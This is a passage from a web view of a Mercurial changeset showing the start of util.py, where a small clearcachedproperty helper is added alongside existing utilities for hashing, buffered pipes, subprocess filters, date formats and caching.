##// END OF EJS Templates
util: add util.clearcachedproperty...
Mark Thomas -
r35021:be6aa0cf default
parent child Browse files
Show More
@@ -1,3861 +1,3866 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import itertools
30 30 import mmap
31 31 import os
32 32 import platform as pyplatform
33 33 import re as remod
34 34 import shutil
35 35 import signal
36 36 import socket
37 37 import stat
38 38 import string
39 39 import subprocess
40 40 import sys
41 41 import tempfile
42 42 import textwrap
43 43 import time
44 44 import traceback
45 45 import warnings
46 46 import zlib
47 47
48 48 from . import (
49 49 encoding,
50 50 error,
51 51 i18n,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 empty = pycompat.empty
66 66 httplib = pycompat.httplib
67 67 pickle = pycompat.pickle
68 68 queue = pycompat.queue
69 69 socketserver = pycompat.socketserver
70 70 stderr = pycompat.stderr
71 71 stdin = pycompat.stdin
72 72 stdout = pycompat.stdout
73 73 stringio = pycompat.stringio
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 httpserver = urllibcompat.httpserver
77 77 urlerr = urllibcompat.urlerr
78 78 urlreq = urllibcompat.urlreq
79 79
80 80 # workaround for win32mbcs
81 81 _filenamebytestr = pycompat.bytestr
82 82
83 83 def isatty(fp):
84 84 try:
85 85 return fp.isatty()
86 86 except AttributeError:
87 87 return False
88 88
89 89 # glibc determines buffering on first write to stdout - if we replace a TTY
90 90 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 91 # buffering
92 92 if isatty(stdout):
93 93 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 94
95 95 if pycompat.iswindows:
96 96 from . import windows as platform
97 97 stdout = platform.winstdout(stdout)
98 98 else:
99 99 from . import posix as platform
100 100
101 101 _ = i18n._
102 102
103 103 bindunixsocket = platform.bindunixsocket
104 104 cachestat = platform.cachestat
105 105 checkexec = platform.checkexec
106 106 checklink = platform.checklink
107 107 copymode = platform.copymode
108 108 executablepath = platform.executablepath
109 109 expandglobs = platform.expandglobs
110 110 explainexit = platform.explainexit
111 111 findexe = platform.findexe
112 112 gethgcmd = platform.gethgcmd
113 113 getuser = platform.getuser
114 114 getpid = os.getpid
115 115 groupmembers = platform.groupmembers
116 116 groupname = platform.groupname
117 117 hidewindow = platform.hidewindow
118 118 isexec = platform.isexec
119 119 isowner = platform.isowner
120 120 listdir = osutil.listdir
121 121 localpath = platform.localpath
122 122 lookupreg = platform.lookupreg
123 123 makedir = platform.makedir
124 124 nlinks = platform.nlinks
125 125 normpath = platform.normpath
126 126 normcase = platform.normcase
127 127 normcasespec = platform.normcasespec
128 128 normcasefallback = platform.normcasefallback
129 129 openhardlinks = platform.openhardlinks
130 130 oslink = platform.oslink
131 131 parsepatchoutput = platform.parsepatchoutput
132 132 pconvert = platform.pconvert
133 133 poll = platform.poll
134 134 popen = platform.popen
135 135 posixfile = platform.posixfile
136 136 quotecommand = platform.quotecommand
137 137 readpipe = platform.readpipe
138 138 rename = platform.rename
139 139 removedirs = platform.removedirs
140 140 samedevice = platform.samedevice
141 141 samefile = platform.samefile
142 142 samestat = platform.samestat
143 143 setbinary = platform.setbinary
144 144 setflags = platform.setflags
145 145 setsignalhandler = platform.setsignalhandler
146 146 shellquote = platform.shellquote
147 147 spawndetached = platform.spawndetached
148 148 split = platform.split
149 149 sshargs = platform.sshargs
150 150 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
151 151 statisexec = platform.statisexec
152 152 statislink = platform.statislink
153 153 testpid = platform.testpid
154 154 umask = platform.umask
155 155 unlink = platform.unlink
156 156 username = platform.username
157 157
158 158 try:
159 159 recvfds = osutil.recvfds
160 160 except AttributeError:
161 161 pass
162 162 try:
163 163 setprocname = osutil.setprocname
164 164 except AttributeError:
165 165 pass
166 166
167 167 # Python compatibility
168 168
169 169 _notset = object()
170 170
171 171 # disable Python's problematic floating point timestamps (issue4836)
172 172 # (Python hypocritically says you shouldn't change this behavior in
173 173 # libraries, and sure enough Mercurial is not a library.)
174 174 os.stat_float_times(False)
175 175
176 176 def safehasattr(thing, attr):
177 177 return getattr(thing, attr, _notset) is not _notset
178 178
179 179 def bytesinput(fin, fout, *args, **kwargs):
180 180 sin, sout = sys.stdin, sys.stdout
181 181 try:
182 182 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
183 183 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
184 184 finally:
185 185 sys.stdin, sys.stdout = sin, sout
186 186
187 187 def bitsfrom(container):
188 188 bits = 0
189 189 for bit in container:
190 190 bits |= bit
191 191 return bits
192 192
193 193 # python 2.6 still have deprecation warning enabled by default. We do not want
194 194 # to display anything to standard user so detect if we are running test and
195 195 # only use python deprecation warning in this case.
196 196 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
197 197 if _dowarn:
198 198 # explicitly unfilter our warning for python 2.7
199 199 #
200 200 # The option of setting PYTHONWARNINGS in the test runner was investigated.
201 201 # However, module name set through PYTHONWARNINGS was exactly matched, so
202 202 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
203 203 # makes the whole PYTHONWARNINGS thing useless for our usecase.
204 204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
205 205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
206 206 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207 207
208 208 def nouideprecwarn(msg, version, stacklevel=1):
209 209 """Issue an python native deprecation warning
210 210
211 211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 212 """
213 213 if _dowarn:
214 214 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
215 215 " update your code.)") % version
216 216 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217 217
218 218 DIGESTS = {
219 219 'md5': hashlib.md5,
220 220 'sha1': hashlib.sha1,
221 221 'sha512': hashlib.sha512,
222 222 }
223 223 # List of digest types from strongest to weakest
224 224 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
225 225
226 226 for k in DIGESTS_BY_STRENGTH:
227 227 assert k in DIGESTS
228 228
229 229 class digester(object):
230 230 """helper to compute digests.
231 231
232 232 This helper can be used to compute one or more digests given their name.
233 233
234 234 >>> d = digester([b'md5', b'sha1'])
235 235 >>> d.update(b'foo')
236 236 >>> [k for k in sorted(d)]
237 237 ['md5', 'sha1']
238 238 >>> d[b'md5']
239 239 'acbd18db4cc2f85cedef654fccc4a4d8'
240 240 >>> d[b'sha1']
241 241 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
242 242 >>> digester.preferred([b'md5', b'sha1'])
243 243 'sha1'
244 244 """
245 245
246 246 def __init__(self, digests, s=''):
247 247 self._hashes = {}
248 248 for k in digests:
249 249 if k not in DIGESTS:
250 250 raise Abort(_('unknown digest type: %s') % k)
251 251 self._hashes[k] = DIGESTS[k]()
252 252 if s:
253 253 self.update(s)
254 254
255 255 def update(self, data):
256 256 for h in self._hashes.values():
257 257 h.update(data)
258 258
259 259 def __getitem__(self, key):
260 260 if key not in DIGESTS:
261 261 raise Abort(_('unknown digest type: %s') % k)
262 262 return self._hashes[key].hexdigest()
263 263
264 264 def __iter__(self):
265 265 return iter(self._hashes)
266 266
267 267 @staticmethod
268 268 def preferred(supported):
269 269 """returns the strongest digest type in both supported and DIGESTS."""
270 270
271 271 for k in DIGESTS_BY_STRENGTH:
272 272 if k in supported:
273 273 return k
274 274 return None
275 275
276 276 class digestchecker(object):
277 277 """file handle wrapper that additionally checks content against a given
278 278 size and digests.
279 279
280 280 d = digestchecker(fh, size, {'md5': '...'})
281 281
282 282 When multiple digests are given, all of them are validated.
283 283 """
284 284
285 285 def __init__(self, fh, size, digests):
286 286 self._fh = fh
287 287 self._size = size
288 288 self._got = 0
289 289 self._digests = dict(digests)
290 290 self._digester = digester(self._digests.keys())
291 291
292 292 def read(self, length=-1):
293 293 content = self._fh.read(length)
294 294 self._digester.update(content)
295 295 self._got += len(content)
296 296 return content
297 297
298 298 def validate(self):
299 299 if self._size != self._got:
300 300 raise Abort(_('size mismatch: expected %d, got %d') %
301 301 (self._size, self._got))
302 302 for k, v in self._digests.items():
303 303 if v != self._digester[k]:
304 304 # i18n: first parameter is a digest name
305 305 raise Abort(_('%s mismatch: expected %s, got %s') %
306 306 (k, v, self._digester[k]))
307 307
308 308 try:
309 309 buffer = buffer
310 310 except NameError:
311 311 def buffer(sliceable, offset=0, length=None):
312 312 if length is not None:
313 313 return memoryview(sliceable)[offset:offset + length]
314 314 return memoryview(sliceable)[offset:]
315 315
316 316 closefds = pycompat.isposix
317 317
318 318 _chunksize = 4096
319 319
320 320 class bufferedinputpipe(object):
321 321 """a manually buffered input pipe
322 322
323 323 Python will not let us use buffered IO and lazy reading with 'polling' at
324 324 the same time. We cannot probe the buffer state and select will not detect
325 325 that data are ready to read if they are already buffered.
326 326
327 327 This class let us work around that by implementing its own buffering
328 328 (allowing efficient readline) while offering a way to know if the buffer is
329 329 empty from the output (allowing collaboration of the buffer with polling).
330 330
331 331 This class lives in the 'util' module because it makes use of the 'os'
332 332 module from the python stdlib.
333 333 """
334 334
335 335 def __init__(self, input):
336 336 self._input = input
337 337 self._buffer = []
338 338 self._eof = False
339 339 self._lenbuf = 0
340 340
341 341 @property
342 342 def hasbuffer(self):
343 343 """True is any data is currently buffered
344 344
345 345 This will be used externally a pre-step for polling IO. If there is
346 346 already data then no polling should be set in place."""
347 347 return bool(self._buffer)
348 348
349 349 @property
350 350 def closed(self):
351 351 return self._input.closed
352 352
353 353 def fileno(self):
354 354 return self._input.fileno()
355 355
356 356 def close(self):
357 357 return self._input.close()
358 358
359 359 def read(self, size):
360 360 while (not self._eof) and (self._lenbuf < size):
361 361 self._fillbuffer()
362 362 return self._frombuffer(size)
363 363
364 364 def readline(self, *args, **kwargs):
365 365 if 1 < len(self._buffer):
366 366 # this should not happen because both read and readline end with a
367 367 # _frombuffer call that collapse it.
368 368 self._buffer = [''.join(self._buffer)]
369 369 self._lenbuf = len(self._buffer[0])
370 370 lfi = -1
371 371 if self._buffer:
372 372 lfi = self._buffer[-1].find('\n')
373 373 while (not self._eof) and lfi < 0:
374 374 self._fillbuffer()
375 375 if self._buffer:
376 376 lfi = self._buffer[-1].find('\n')
377 377 size = lfi + 1
378 378 if lfi < 0: # end of file
379 379 size = self._lenbuf
380 380 elif 1 < len(self._buffer):
381 381 # we need to take previous chunks into account
382 382 size += self._lenbuf - len(self._buffer[-1])
383 383 return self._frombuffer(size)
384 384
385 385 def _frombuffer(self, size):
386 386 """return at most 'size' data from the buffer
387 387
388 388 The data are removed from the buffer."""
389 389 if size == 0 or not self._buffer:
390 390 return ''
391 391 buf = self._buffer[0]
392 392 if 1 < len(self._buffer):
393 393 buf = ''.join(self._buffer)
394 394
395 395 data = buf[:size]
396 396 buf = buf[len(data):]
397 397 if buf:
398 398 self._buffer = [buf]
399 399 self._lenbuf = len(buf)
400 400 else:
401 401 self._buffer = []
402 402 self._lenbuf = 0
403 403 return data
404 404
405 405 def _fillbuffer(self):
406 406 """read data to the buffer"""
407 407 data = os.read(self._input.fileno(), _chunksize)
408 408 if not data:
409 409 self._eof = True
410 410 else:
411 411 self._lenbuf += len(data)
412 412 self._buffer.append(data)
413 413
414 414 def mmapread(fp):
415 415 try:
416 416 fd = getattr(fp, 'fileno', lambda: fp)()
417 417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 418 except ValueError:
419 419 # Empty files cannot be mmapped, but mmapread should still work. Check
420 420 # if the file is empty, and if so, return an empty buffer.
421 421 if os.fstat(fd).st_size == 0:
422 422 return ''
423 423 raise
424 424
425 425 def popen2(cmd, env=None, newlines=False):
426 426 # Setting bufsize to -1 lets the system decide the buffer size.
427 427 # The default for bufsize is 0, meaning unbuffered. This leads to
428 428 # poor performance on Mac OS X: http://bugs.python.org/issue4194
429 429 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
430 430 close_fds=closefds,
431 431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
432 432 universal_newlines=newlines,
433 433 env=env)
434 434 return p.stdin, p.stdout
435 435
436 436 def popen3(cmd, env=None, newlines=False):
437 437 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
438 438 return stdin, stdout, stderr
439 439
440 440 def popen4(cmd, env=None, newlines=False, bufsize=-1):
441 441 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
442 442 close_fds=closefds,
443 443 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
444 444 stderr=subprocess.PIPE,
445 445 universal_newlines=newlines,
446 446 env=env)
447 447 return p.stdin, p.stdout, p.stderr, p
448 448
449 449 def version():
450 450 """Return version information if available."""
451 451 try:
452 452 from . import __version__
453 453 return __version__.version
454 454 except ImportError:
455 455 return 'unknown'
456 456
457 457 def versiontuple(v=None, n=4):
458 458 """Parses a Mercurial version string into an N-tuple.
459 459
460 460 The version string to be parsed is specified with the ``v`` argument.
461 461 If it isn't defined, the current Mercurial version string will be parsed.
462 462
463 463 ``n`` can be 2, 3, or 4. Here is how some version strings map to
464 464 returned values:
465 465
466 466 >>> v = b'3.6.1+190-df9b73d2d444'
467 467 >>> versiontuple(v, 2)
468 468 (3, 6)
469 469 >>> versiontuple(v, 3)
470 470 (3, 6, 1)
471 471 >>> versiontuple(v, 4)
472 472 (3, 6, 1, '190-df9b73d2d444')
473 473
474 474 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
475 475 (3, 6, 1, '190-df9b73d2d444+20151118')
476 476
477 477 >>> v = b'3.6'
478 478 >>> versiontuple(v, 2)
479 479 (3, 6)
480 480 >>> versiontuple(v, 3)
481 481 (3, 6, None)
482 482 >>> versiontuple(v, 4)
483 483 (3, 6, None, None)
484 484
485 485 >>> v = b'3.9-rc'
486 486 >>> versiontuple(v, 2)
487 487 (3, 9)
488 488 >>> versiontuple(v, 3)
489 489 (3, 9, None)
490 490 >>> versiontuple(v, 4)
491 491 (3, 9, None, 'rc')
492 492
493 493 >>> v = b'3.9-rc+2-02a8fea4289b'
494 494 >>> versiontuple(v, 2)
495 495 (3, 9)
496 496 >>> versiontuple(v, 3)
497 497 (3, 9, None)
498 498 >>> versiontuple(v, 4)
499 499 (3, 9, None, 'rc+2-02a8fea4289b')
500 500 """
501 501 if not v:
502 502 v = version()
503 503 parts = remod.split('[\+-]', v, 1)
504 504 if len(parts) == 1:
505 505 vparts, extra = parts[0], None
506 506 else:
507 507 vparts, extra = parts
508 508
509 509 vints = []
510 510 for i in vparts.split('.'):
511 511 try:
512 512 vints.append(int(i))
513 513 except ValueError:
514 514 break
515 515 # (3, 6) -> (3, 6, None)
516 516 while len(vints) < 3:
517 517 vints.append(None)
518 518
519 519 if n == 2:
520 520 return (vints[0], vints[1])
521 521 if n == 3:
522 522 return (vints[0], vints[1], vints[2])
523 523 if n == 4:
524 524 return (vints[0], vints[1], vints[2], extra)
525 525
526 526 # used by parsedate
527 527 defaultdateformats = (
528 528 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
529 529 '%Y-%m-%dT%H:%M', # without seconds
530 530 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
531 531 '%Y-%m-%dT%H%M', # without seconds
532 532 '%Y-%m-%d %H:%M:%S', # our common legal variant
533 533 '%Y-%m-%d %H:%M', # without seconds
534 534 '%Y-%m-%d %H%M%S', # without :
535 535 '%Y-%m-%d %H%M', # without seconds
536 536 '%Y-%m-%d %I:%M:%S%p',
537 537 '%Y-%m-%d %H:%M',
538 538 '%Y-%m-%d %I:%M%p',
539 539 '%Y-%m-%d',
540 540 '%m-%d',
541 541 '%m/%d',
542 542 '%m/%d/%y',
543 543 '%m/%d/%Y',
544 544 '%a %b %d %H:%M:%S %Y',
545 545 '%a %b %d %I:%M:%S%p %Y',
546 546 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
547 547 '%b %d %H:%M:%S %Y',
548 548 '%b %d %I:%M:%S%p %Y',
549 549 '%b %d %H:%M:%S',
550 550 '%b %d %I:%M:%S%p',
551 551 '%b %d %H:%M',
552 552 '%b %d %I:%M%p',
553 553 '%b %d %Y',
554 554 '%b %d',
555 555 '%H:%M:%S',
556 556 '%I:%M:%S%p',
557 557 '%H:%M',
558 558 '%I:%M%p',
559 559 )
560 560
561 561 extendeddateformats = defaultdateformats + (
562 562 "%Y",
563 563 "%Y-%m",
564 564 "%b",
565 565 "%b %Y",
566 566 )
567 567
568 568 def cachefunc(func):
569 569 '''cache the result of function calls'''
570 570 # XXX doesn't handle keywords args
571 571 if func.__code__.co_argcount == 0:
572 572 cache = []
573 573 def f():
574 574 if len(cache) == 0:
575 575 cache.append(func())
576 576 return cache[0]
577 577 return f
578 578 cache = {}
579 579 if func.__code__.co_argcount == 1:
580 580 # we gain a small amount of time because
581 581 # we don't need to pack/unpack the list
582 582 def f(arg):
583 583 if arg not in cache:
584 584 cache[arg] = func(arg)
585 585 return cache[arg]
586 586 else:
587 587 def f(*args):
588 588 if args not in cache:
589 589 cache[args] = func(*args)
590 590 return cache[args]
591 591
592 592 return f
593 593
594 594 class cow(object):
595 595 """helper class to make copy-on-write easier
596 596
597 597 Call preparewrite before doing any writes.
598 598 """
599 599
600 600 def preparewrite(self):
601 601 """call this before writes, return self or a copied new object"""
602 602 if getattr(self, '_copied', 0):
603 603 self._copied -= 1
604 604 return self.__class__(self)
605 605 return self
606 606
607 607 def copy(self):
608 608 """always do a cheap copy"""
609 609 self._copied = getattr(self, '_copied', 0) + 1
610 610 return self
611 611
612 612 class sortdict(collections.OrderedDict):
613 613 '''a simple sorted dictionary
614 614
615 615 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
616 616 >>> d2 = d1.copy()
617 617 >>> d2
618 618 sortdict([('a', 0), ('b', 1)])
619 619 >>> d2.update([(b'a', 2)])
620 620 >>> list(d2.keys()) # should still be in last-set order
621 621 ['b', 'a']
622 622 '''
623 623
624 624 def __setitem__(self, key, value):
625 625 if key in self:
626 626 del self[key]
627 627 super(sortdict, self).__setitem__(key, value)
628 628
629 629 if pycompat.ispypy:
630 630 # __setitem__() isn't called as of PyPy 5.8.0
631 631 def update(self, src):
632 632 if isinstance(src, dict):
633 633 src = src.iteritems()
634 634 for k, v in src:
635 635 self[k] = v
636 636
637 637 class cowdict(cow, dict):
638 638 """copy-on-write dict
639 639
640 640 Be sure to call d = d.preparewrite() before writing to d.
641 641
642 642 >>> a = cowdict()
643 643 >>> a is a.preparewrite()
644 644 True
645 645 >>> b = a.copy()
646 646 >>> b is a
647 647 True
648 648 >>> c = b.copy()
649 649 >>> c is a
650 650 True
651 651 >>> a = a.preparewrite()
652 652 >>> b is a
653 653 False
654 654 >>> a is a.preparewrite()
655 655 True
656 656 >>> c = c.preparewrite()
657 657 >>> b is c
658 658 False
659 659 >>> b is b.preparewrite()
660 660 True
661 661 """
662 662
663 663 class cowsortdict(cow, sortdict):
664 664 """copy-on-write sortdict
665 665
666 666 Be sure to call d = d.preparewrite() before writing to d.
667 667 """
668 668
669 669 class transactional(object):
670 670 """Base class for making a transactional type into a context manager."""
671 671 __metaclass__ = abc.ABCMeta
672 672
673 673 @abc.abstractmethod
674 674 def close(self):
675 675 """Successfully closes the transaction."""
676 676
677 677 @abc.abstractmethod
678 678 def release(self):
679 679 """Marks the end of the transaction.
680 680
681 681 If the transaction has not been closed, it will be aborted.
682 682 """
683 683
684 684 def __enter__(self):
685 685 return self
686 686
687 687 def __exit__(self, exc_type, exc_val, exc_tb):
688 688 try:
689 689 if exc_type is None:
690 690 self.close()
691 691 finally:
692 692 self.release()
693 693
694 694 @contextlib.contextmanager
695 695 def acceptintervention(tr=None):
696 696 """A context manager that closes the transaction on InterventionRequired
697 697
698 698 If no transaction was provided, this simply runs the body and returns
699 699 """
700 700 if not tr:
701 701 yield
702 702 return
703 703 try:
704 704 yield
705 705 tr.close()
706 706 except error.InterventionRequired:
707 707 tr.close()
708 708 raise
709 709 finally:
710 710 tr.release()
711 711
712 712 @contextlib.contextmanager
713 713 def nullcontextmanager():
714 714 yield
715 715
716 716 class _lrucachenode(object):
717 717 """A node in a doubly linked list.
718 718
719 719 Holds a reference to nodes on either side as well as a key-value
720 720 pair for the dictionary entry.
721 721 """
722 722 __slots__ = (u'next', u'prev', u'key', u'value')
723 723
724 724 def __init__(self):
725 725 self.next = None
726 726 self.prev = None
727 727
728 728 self.key = _notset
729 729 self.value = None
730 730
731 731 def markempty(self):
732 732 """Mark the node as emptied."""
733 733 self.key = _notset
734 734
735 735 class lrucachedict(object):
736 736 """Dict that caches most recent accesses and sets.
737 737
738 738 The dict consists of an actual backing dict - indexed by original
739 739 key - and a doubly linked circular list defining the order of entries in
740 740 the cache.
741 741
742 742 The head node is the newest entry in the cache. If the cache is full,
743 743 we recycle head.prev and make it the new head. Cache accesses result in
744 744 the node being moved to before the existing head and being marked as the
745 745 new head node.
746 746 """
747 747 def __init__(self, max):
748 748 self._cache = {}
749 749
750 750 self._head = head = _lrucachenode()
751 751 head.prev = head
752 752 head.next = head
753 753 self._size = 1
754 754 self._capacity = max
755 755
756 756 def __len__(self):
757 757 return len(self._cache)
758 758
759 759 def __contains__(self, k):
760 760 return k in self._cache
761 761
762 762 def __iter__(self):
763 763 # We don't have to iterate in cache order, but why not.
764 764 n = self._head
765 765 for i in range(len(self._cache)):
766 766 yield n.key
767 767 n = n.next
768 768
769 769 def __getitem__(self, k):
770 770 node = self._cache[k]
771 771 self._movetohead(node)
772 772 return node.value
773 773
774 774 def __setitem__(self, k, v):
775 775 node = self._cache.get(k)
776 776 # Replace existing value and mark as newest.
777 777 if node is not None:
778 778 node.value = v
779 779 self._movetohead(node)
780 780 return
781 781
782 782 if self._size < self._capacity:
783 783 node = self._addcapacity()
784 784 else:
785 785 # Grab the last/oldest item.
786 786 node = self._head.prev
787 787
788 788 # At capacity. Kill the old entry.
789 789 if node.key is not _notset:
790 790 del self._cache[node.key]
791 791
792 792 node.key = k
793 793 node.value = v
794 794 self._cache[k] = node
795 795 # And mark it as newest entry. No need to adjust order since it
796 796 # is already self._head.prev.
797 797 self._head = node
798 798
799 799 def __delitem__(self, k):
800 800 node = self._cache.pop(k)
801 801 node.markempty()
802 802
803 803 # Temporarily mark as newest item before re-adjusting head to make
804 804 # this node the oldest item.
805 805 self._movetohead(node)
806 806 self._head = node.next
807 807
808 808 # Additional dict methods.
809 809
810 810 def get(self, k, default=None):
811 811 try:
812 812 return self._cache[k].value
813 813 except KeyError:
814 814 return default
815 815
816 816 def clear(self):
817 817 n = self._head
818 818 while n.key is not _notset:
819 819 n.markempty()
820 820 n = n.next
821 821
822 822 self._cache.clear()
823 823
824 824 def copy(self):
825 825 result = lrucachedict(self._capacity)
826 826 n = self._head.prev
827 827 # Iterate in oldest-to-newest order, so the copy has the right ordering
828 828 for i in range(len(self._cache)):
829 829 result[n.key] = n.value
830 830 n = n.prev
831 831 return result
832 832
833 833 def _movetohead(self, node):
834 834 """Mark a node as the newest, making it the new head.
835 835
836 836 When a node is accessed, it becomes the freshest entry in the LRU
837 837 list, which is denoted by self._head.
838 838
839 839 Visually, let's make ``N`` the new head node (* denotes head):
840 840
841 841 previous/oldest <-> head <-> next/next newest
842 842
843 843 ----<->--- A* ---<->-----
844 844 | |
845 845 E <-> D <-> N <-> C <-> B
846 846
847 847 To:
848 848
849 849 ----<->--- N* ---<->-----
850 850 | |
851 851 E <-> D <-> C <-> B <-> A
852 852
853 853 This requires the following moves:
854 854
855 855 C.next = D (node.prev.next = node.next)
856 856 D.prev = C (node.next.prev = node.prev)
857 857 E.next = N (head.prev.next = node)
858 858 N.prev = E (node.prev = head.prev)
859 859 N.next = A (node.next = head)
860 860 A.prev = N (head.prev = node)
861 861 """
862 862 head = self._head
863 863 # C.next = D
864 864 node.prev.next = node.next
865 865 # D.prev = C
866 866 node.next.prev = node.prev
867 867 # N.prev = E
868 868 node.prev = head.prev
869 869 # N.next = A
870 870 # It is tempting to do just "head" here, however if node is
871 871 # adjacent to head, this will do bad things.
872 872 node.next = head.prev.next
873 873 # E.next = N
874 874 node.next.prev = node
875 875 # A.prev = N
876 876 node.prev.next = node
877 877
878 878 self._head = node
879 879
880 880 def _addcapacity(self):
881 881 """Add a node to the circular linked list.
882 882
883 883 The new node is inserted before the head node.
884 884 """
885 885 head = self._head
886 886 node = _lrucachenode()
887 887 head.prev.next = node
888 888 node.prev = head.prev
889 889 node.next = head
890 890 head.prev = node
891 891 self._size += 1
892 892 return node
893 893
894 894 def lrucachefunc(func):
895 895 '''cache most recent results of function calls'''
896 896 cache = {}
897 897 order = collections.deque()
898 898 if func.__code__.co_argcount == 1:
899 899 def f(arg):
900 900 if arg not in cache:
901 901 if len(cache) > 20:
902 902 del cache[order.popleft()]
903 903 cache[arg] = func(arg)
904 904 else:
905 905 order.remove(arg)
906 906 order.append(arg)
907 907 return cache[arg]
908 908 else:
909 909 def f(*args):
910 910 if args not in cache:
911 911 if len(cache) > 20:
912 912 del cache[order.popleft()]
913 913 cache[args] = func(*args)
914 914 else:
915 915 order.remove(args)
916 916 order.append(args)
917 917 return cache[args]
918 918
919 919 return f
920 920
921 921 class propertycache(object):
922 922 def __init__(self, func):
923 923 self.func = func
924 924 self.name = func.__name__
925 925 def __get__(self, obj, type=None):
926 926 result = self.func(obj)
927 927 self.cachevalue(obj, result)
928 928 return result
929 929
930 930 def cachevalue(self, obj, value):
931 931 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
932 932 obj.__dict__[self.name] = value
933 933
934 def clearcachedproperty(obj, prop):
935 '''clear a cached property value, if one has been set'''
936 if prop in obj.__dict__:
937 del obj.__dict__[prop]
938
934 939 def pipefilter(s, cmd):
935 940 '''filter string S through command CMD, returning its output'''
936 941 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
937 942 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
938 943 pout, perr = p.communicate(s)
939 944 return pout
940 945
941 946 def tempfilter(s, cmd):
942 947 '''filter string S through a pair of temporary files with CMD.
943 948 CMD is used as a template to create the real command to be run,
944 949 with the strings INFILE and OUTFILE replaced by the real names of
945 950 the temporary files generated.'''
946 951 inname, outname = None, None
947 952 try:
948 953 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
949 954 fp = os.fdopen(infd, pycompat.sysstr('wb'))
950 955 fp.write(s)
951 956 fp.close()
952 957 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
953 958 os.close(outfd)
954 959 cmd = cmd.replace('INFILE', inname)
955 960 cmd = cmd.replace('OUTFILE', outname)
956 961 code = os.system(cmd)
957 962 if pycompat.sysplatform == 'OpenVMS' and code & 1:
958 963 code = 0
959 964 if code:
960 965 raise Abort(_("command '%s' failed: %s") %
961 966 (cmd, explainexit(code)))
962 967 return readfile(outname)
963 968 finally:
964 969 try:
965 970 if inname:
966 971 os.unlink(inname)
967 972 except OSError:
968 973 pass
969 974 try:
970 975 if outname:
971 976 os.unlink(outname)
972 977 except OSError:
973 978 pass
974 979
975 980 filtertable = {
976 981 'tempfile:': tempfilter,
977 982 'pipe:': pipefilter,
978 983 }
979 984
980 985 def filter(s, cmd):
981 986 "filter a string through a command that transforms its input to its output"
982 987 for name, fn in filtertable.iteritems():
983 988 if cmd.startswith(name):
984 989 return fn(s, cmd[len(name):].lstrip())
985 990 return pipefilter(s, cmd)
986 991
987 992 def binary(s):
988 993 """return true if a string is binary data"""
989 994 return bool(s and '\0' in s)
990 995
991 996 def increasingchunks(source, min=1024, max=65536):
992 997 '''return no less than min bytes per chunk while data remains,
993 998 doubling min after each chunk until it reaches max'''
994 999 def log2(x):
995 1000 if not x:
996 1001 return 0
997 1002 i = 0
998 1003 while x:
999 1004 x >>= 1
1000 1005 i += 1
1001 1006 return i - 1
1002 1007
1003 1008 buf = []
1004 1009 blen = 0
1005 1010 for chunk in source:
1006 1011 buf.append(chunk)
1007 1012 blen += len(chunk)
1008 1013 if blen >= min:
1009 1014 if min < max:
1010 1015 min = min << 1
1011 1016 nmin = 1 << log2(blen)
1012 1017 if nmin > min:
1013 1018 min = nmin
1014 1019 if min > max:
1015 1020 min = max
1016 1021 yield ''.join(buf)
1017 1022 blen = 0
1018 1023 buf = []
1019 1024 if buf:
1020 1025 yield ''.join(buf)
1021 1026
1022 1027 Abort = error.Abort
1023 1028
1024 1029 def always(fn):
1025 1030 return True
1026 1031
1027 1032 def never(fn):
1028 1033 return False
1029 1034
1030 1035 def nogc(func):
1031 1036 """disable garbage collector
1032 1037
1033 1038 Python's garbage collector triggers a GC each time a certain number of
1034 1039 container objects (the number being defined by gc.get_threshold()) are
1035 1040 allocated even when marked not to be tracked by the collector. Tracking has
